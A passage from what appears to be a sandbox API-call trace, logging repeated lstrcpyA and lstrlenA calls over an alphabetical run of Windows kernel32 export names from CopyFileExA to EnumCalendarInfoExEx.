(in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.726] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.726] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.726] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.726] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.726] lstrlenA (lpString="COPYFILEW") returned 9 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.726] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.726] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.726] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.726] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.726] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.726] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.726] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.727] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.727] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.727] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.727] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.727] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.727] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.727] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.727] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.727] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.727] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.727] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.727] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.727] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.727] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.727] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.727] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.727] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.727] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.727] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.728] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.728] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.728] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.728] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.728] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.728] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.728] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.728] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.728] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.728] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.728] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.728] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.728] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.728] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.728] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.728] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.728] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.728] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.728] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.728] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.729] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.729] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.729] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.729] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.729] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.729] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.729] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.729] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.729] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.729] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.729] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.729] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.729] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.729] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.729] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.729] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.729] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.729] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.729] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.729] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.730] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.730] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.730] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.730] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.730] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.730] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.730] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.730] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.730] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.730] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.730] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.730] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.730] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.730] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.730] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.730] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.730] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.730] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.730] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.730] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.730] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.731] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.731] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.731] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.731] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.731] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.731] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.731] lstrlenA (lpString="DELETEATOM") returned 10 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.731] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.731] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.731] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.731] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.731] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.731] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.731] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.731] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.731] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.731] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.731] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.731] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.731] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.732] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.732] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.732] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.732] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.732] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.732] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.732] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.732] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.732] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.732] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.732] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.732] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.732] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.732] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.732] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.732] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.732] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.732] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.732] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.732] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.733] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.733] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.733] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.733] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.733] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.733] 